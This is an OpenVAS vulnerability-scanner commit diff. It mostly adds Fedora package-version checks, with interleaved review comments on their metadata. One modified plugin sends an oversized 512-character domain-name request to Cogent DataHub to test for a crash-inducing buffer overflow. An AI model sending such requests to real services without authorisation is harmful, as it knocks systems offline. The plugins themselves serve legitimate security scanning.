[Openvas-commits] r11702 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
Tue Sep 27 17:30:02 CEST 2011
Author: veerendragg
Date: 2011-09-27 17:29:53 +0200 (Tue, 27 Sep 2011)
New Revision: 11702
Added:
trunk/openvas-plugins/scripts/gb_fedora_2011_11196_foomatic_fc15.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_11205_foomatic_fc14.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_12145_qt_fc14.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_12300_nss_fc14.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_12580_quassel_fc14.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_12614_quassel_fc15.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_12687_cherokee_fc14.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_12698_cherokee_fc15.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_3627_openldap_fc14.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_9820_libsoup_fc14.nasl
trunk/openvas-plugins/scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl
trunk/openvas-plugins/scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl
trunk/openvas-plugins/scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl
Modified:
trunk/openvas-plugins/ChangeLog
trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl
trunk/openvas-plugins/scripts/gb_merak_mail_server_detect.nasl
trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl
Log:
Added new plugins. Updated to detect latest version. Added application confirmation and updated code completely as exploit was not working properly. Added new LSC plugins.
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/ChangeLog 2011-09-27 15:29:53 UTC (rev 11702)
@@ -1,3 +1,31 @@
+2011-09-27 Veerendra G.G <veerendragg at secpod.com>
+
+ * scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl,
+ scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl,
+ scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl:
+ Added new plugins.
+
+ * scripts/gb_merak_mail_server_detect.nasl:
+ Updated to detect latest version.
+
+ * scripts/gb_cogent_datahub_unicode_bof_vuln.nasl,
+ scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl:
+ Added application confirmation and Updated code completely as exploit
+ was not working properly.
+
+ * scripts/gb_fedora_2011_9820_libsoup_fc14.nasl,
+ scripts/gb_fedora_2011_12698_cherokee_fc15.nasl,
+ scripts/gb_fedora_2011_3627_openldap_fc14.nasl,
+ scripts/gb_fedora_2011_12687_cherokee_fc14.nasl,
+ scripts/gb_fedora_2011_12145_qt_fc14.nasl,
+ scripts/gb_fedora_2011_11196_foomatic_fc15.nasl,
+ scripts/gb_fedora_2011_12614_quassel_fc15.nasl,
+ scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl,
+ scripts/gb_fedora_2011_12580_quassel_fc14.nasl,
+ scripts/gb_fedora_2011_12300_nss_fc14.nasl,
+ scripts/gb_fedora_2011_11205_foomatic_fc14.nasl:
+ Added new LSC plugins.
+
2011-09-27 Henri Doreau <henri.doreau at greenbone.net>
* scripts/secpod_ms_win_media_player_detect_900173.nasl: Don't
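Review bot: the entry for gb_cogent_datahub_unicode_bof_vuln.nasl and secpod_metaserver_rt_multiple_dos_vuln.nasl says the code was "Updated completely as exploit was not working properly" without saying what was wrong; a ChangeLog line is more useful to the next maintainer if it names the concrete defect (for the Cogent check, the attack request was sent twice and the reply was never read, which this commit replaces with a recv) and what the application confirmation matches on.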
@@ -44,7 +72,7 @@
* scripts/gb_openssl_detect_lin.nasl: Updated regexp to produce a
valid CPE (avoid suffix letter duplication).
-2011-09-22 Veerendra G.G <veerendragg at secpod.com>,
+2011-09-22 Veerendra G.G <veerendragg at secpod.com>
* scripts/secpod_colasoft_capsa_snmp_dos_vuln.nasl,
scripts/secpod_google_chrome_mult_vuln_sep11_lin.nasl,
Modified: trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -86,6 +86,16 @@
exit(0);
}
+## Send normal request
+req = string('(domain "openvas-test")', raw_string(0x0a));
+send(socket:soc, data:req);
+res = recv(socket:soc, length:1024);
+
+## Confirm Application
+if('success "domain" "openvas-test"' >!< res){
+ exit(0);
+}
+
## Construct Attack Request
attack = crap(data: "a", length:512);
req = string('(domain "', attack, '")', raw_string(0x0a),
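Review bot: the confirmation step creates a domain named "openvas-test" on the target before the attack, so it is a state-changing write rather than a read-only probe; if the DataHub protocol offers a harmless query that also echoes a recognisable reply, prefer that for application confirmation, otherwise note in the comment that the domain is left behind on the scanned host. The match on the literal reply `success "domain" "openvas-test"` is exact, so any change in the server's quoting or spacing makes the check exit silently; consider a looser match on `success` plus the domain name, or at least a comment recording which versions produced this exact string.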
@@ -96,7 +106,7 @@
## Sending Attack
send(socket:soc, data:req);
-send(socket:soc, data:req);
+res = recv(socket:soc, length:1024);
close(soc);
sleep(5);
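Review bot: `res = recv(socket:soc, length:1024);` replaces the duplicated send, but `res` is not examined anywhere in the visible lines, so the assignment only serves to wait for the server to process the request; either say so in the comment (the `## Sending Attack` comment now sits above a send followed by a recv) or use the absence of a reply as an additional signal before the post-`sleep(5)` reconnection check, since a server that has already crashed will not answer at all.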
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_11196_foomatic_fc15.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_11196_foomatic_fc15.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_11196_foomatic_fc15.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,92 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for foomatic FEDORA-2011-11196
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863536);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"cvss_base", value:"6.8");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2011-11196");
+ script_cve_id("CVE-2011-2924", "CVE-2011-2697", "CVE-2011-2923");
+ script_name("Fedora Update for foomatic FEDORA-2011-11196");
+ desc = "
+
+ Vulnerability Insight:
+ Foomatic is a comprehensive, spooler-independent database of printers,
+ printer drivers, and driver descriptions. This package contains
+ utilities to generate driver description files and printer queues for
+ CUPS, LPD, LPRng, and PDQ using the database (packaged separately).
+ There is also the possibility to read the PJL options out of PJL-capable
+ laser printers and take them into account at the driver description
+ file generation.
+
+ There are spooler-independent command line interfaces to manipulate
+ queues (foomatic-configure) and to print files/manipulate jobs
+ (foomatic printjob).
+ The site http://www.linuxprinting.org/
+
+
+ Affected Software/OS:
+ foomatic on Fedora 15
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066208.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of foomatic");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC15")
+{
+
+ if(isrpmvuln(pkg:"foomatic", rpm:"foomatic~4.0.8~3.fc15", rls:"FC15"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
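Review bot: the "Vulnerability Insight" block is the Fedora package description rather than a description of the flaws, and it ends in a dangling fragment ("The site http://www.linuxprinting.org/") that was evidently cut from the upstream text; trim the fragment and add one sentence on what FEDORA-2011-11196 fixes so the three CVE ids in `script_cve_id` have some context in the report. The same fragment appears in the fc14 twin of this check further down. The file is also committed without a trailing newline.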
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_11205_foomatic_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_11205_foomatic_fc14.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_11205_foomatic_fc14.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for foomatic FEDORA-2011-11205
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863540);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"cvss_base", value:"6.8");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2011-11205");
+ script_cve_id("CVE-2011-2924", "CVE-2011-2697", "CVE-2011-2923");
+ script_name("Fedora Update for foomatic FEDORA-2011-11205");
+ desc = "
+
+ Vulnerability Insight:
+ Foomatic is a comprehensive, spooler-independent database of printers,
+ printer drivers, and driver descriptions. This package contains
+ utilities to generate driver description files and printer queues for
+ CUPS, LPD, LPRng, and PDQ using the database (packaged separately).
+ There is also the possibility to read the PJL options out of PJL-capable
+ laser printers and take them into account at the driver description
+ file generation.
+
+ There are spooler-independent command line interfaces to manipulate
+ queues (foomatic-configure) and to print files/manipulate jobs
+ (foomatic printjob).
+
+ The site http://www.linuxprinting.org/
+
+
+ Affected Software/OS:
+ foomatic on Fedora 14
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066225.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of foomatic");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC14")
+{
+
+ if(isrpmvuln(pkg:"foomatic", rpm:"foomatic~4.0.8~3.fc14", rls:"FC14"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12145_qt_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12145_qt_fc14.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12145_qt_fc14.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for qt FEDORA-2011-12145
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863543);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"cvss_base", value:"9.3");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_xref(name: "FEDORA", value: "2011-12145");
+ script_cve_id("CVE-2010-1822", "CVE-2011-3194");
+ script_name("Fedora Update for qt FEDORA-2011-12145");
+ desc = "
+
+ Vulnerability Insight:
+ Qt is a software toolkit for developing applications.
+
+ This package contains base tools, like string, xml, and network
+ handling.
+
+ Affected Software/OS:
+ qt on Fedora 14
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066209.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of qt");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC14")
+{
+
+ if(isrpmvuln(pkg:"qt", rpm:"qt~4.7.4~2.fc14", rls:"FC14"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12300_nss_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12300_nss_fc14.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12300_nss_fc14.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for nss FEDORA-2011-12300
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863544);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2011-12300");
+ script_name("Fedora Update for nss FEDORA-2011-12300");
+ desc = "
+
+ Vulnerability Insight:
+ Network Security Services (NSS) is a set of libraries designed to
+ support cross-platform development of security-enabled client and
+ server applications. Applications built with NSS can support SSL v2
+ and v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509
+ v3 certificates, and other security standards.
+
+
+ Affected Software/OS:
+ nss on Fedora 14
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066221.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of nss");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC14")
+{
+
+ if(isrpmvuln(pkg:"nss", rpm:"nss~3.12.10~4.fc14", rls:"FC14"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
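Review bot: this check sets `risk_factor` to "High" but, unlike the foomatic, qt and rsyslog checks in the same commit, carries no `cvss_base` tag and no `script_cve_id` call, so the reported severity has nothing backing it and the result cannot be correlated with the CVEs the NSS update addresses; add the CVE ids and CVSS score from the referenced advisory, or if the advisory lists none, say so in the description.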
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12580_quassel_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12580_quassel_fc14.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12580_quassel_fc14.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for quassel FEDORA-2011-12580
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863539);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2011-12580");
+ script_cve_id("CVE-2011-3354");
+ script_name("Fedora Update for quassel FEDORA-2011-12580");
+ desc = "
+
+ Vulnerability Insight:
+ Quassel IRC is a modern, distributed IRC client,
+ meaning that one (or multiple) client(s) can attach
+ to and detach from a central core --
+ much like the popular combination of screen and a
+ text-based IRC client such as WeeChat, but graphical
+
+
+ Affected Software/OS:
+ quassel on Fedora 14
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066250.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of quassel");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC14")
+{
+
+ if(isrpmvuln(pkg:"quassel", rpm:"quassel~0.7.3~1.fc14", rls:"FC14"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
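Review bot: `risk_factor` is "High" but no `cvss_base` tag is set, so the severity is inconsistent with the sibling checks that carry both; also the description paragraph ends mid-sentence ("but graphical") without terminating punctuation. Both points apply equally to the fc15 copy of this check below.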
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12614_quassel_fc15.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12614_quassel_fc15.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12614_quassel_fc15.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for quassel FEDORA-2011-12614
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863545);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2011-12614");
+ script_cve_id("CVE-2011-3354");
+ script_name("Fedora Update for quassel FEDORA-2011-12614");
+ desc = "
+
+ Vulnerability Insight:
+ Quassel IRC is a modern, distributed IRC client,
+ meaning that one (or multiple) client(s) can attach
+ to and detach from a central core --
+ much like the popular combination of screen and a
+ text-based IRC client such as WeeChat, but graphical
+
+
+ Affected Software/OS:
+ quassel on Fedora 15
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066265.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of quassel");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC15")
+{
+
+ if(isrpmvuln(pkg:"quassel", rpm:"quassel~0.7.3~1.fc15", rls:"FC15"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,86 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for rsyslog FEDORA-2011-12616
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863537);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_xref(name: "FEDORA", value: "2011-12616");
+ script_cve_id("CVE-2011-3200");
+ script_name("Fedora Update for rsyslog FEDORA-2011-12616");
+ desc = "
+
+ Vulnerability Insight:
+ Rsyslog is an enhanced, multi-threaded syslog daemon. It supports MySQL,
+ syslog/TCP, RFC 3195, permitted sender lists, filtering on any message part,
+ and fine grain output format control. It is compatible with stock sysklogd
+ and can be used as a drop-in replacement. Rsyslog is simple to set up, with
+ advanced features suitable for enterprise-class, encryption-protected syslog
+ relay chains.
+
+
+ Affected Software/OS:
+ rsyslog on Fedora 15
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066271.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of rsyslog");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC15")
+{
+
+ if(isrpmvuln(pkg:"rsyslog", rpm:"rsyslog~5.8.5~1.fc15", rls:"FC15"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12687_cherokee_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12687_cherokee_fc14.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12687_cherokee_fc14.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for cherokee FEDORA-2011-12687
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863541);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2011-12687");
+ script_cve_id("CVE-2011-2190", "CVE-2011-2191");
+ script_name("Fedora Update for cherokee FEDORA-2011-12687");
+ desc = "
+
+ Vulnerability Insight:
+ Cherokee is a very fast, flexible and easy to configure Web Server. It supports
+ the widespread technologies nowadays: FastCGI, SCGI, PHP, CGI, TLS and SSL
+ encrypted connections, Virtual hosts, Authentication, on the fly encoding,
+ Apache compatible log files, and much more.
+
+
+ Affected Software/OS:
+ cherokee on Fedora 14
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066257.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of cherokee");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC14")
+{
+
+ if(isrpmvuln(pkg:"cherokee", rpm:"cherokee~1.2.99~1.fc14", rls:"FC14"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
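Review bot: as with the quassel checks, `risk_factor` "High" is set without a `cvss_base` tag, while `script_cve_id` lists CVE-2011-2190 and CVE-2011-2191; add the CVSS score from the advisory so the risk factor is derived rather than asserted. The fc15 copy below has the same gap.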
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12698_cherokee_fc15.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12698_cherokee_fc15.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12698_cherokee_fc15.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for cherokee FEDORA-2011-12698
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863538);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"risk_factor", value:"High");
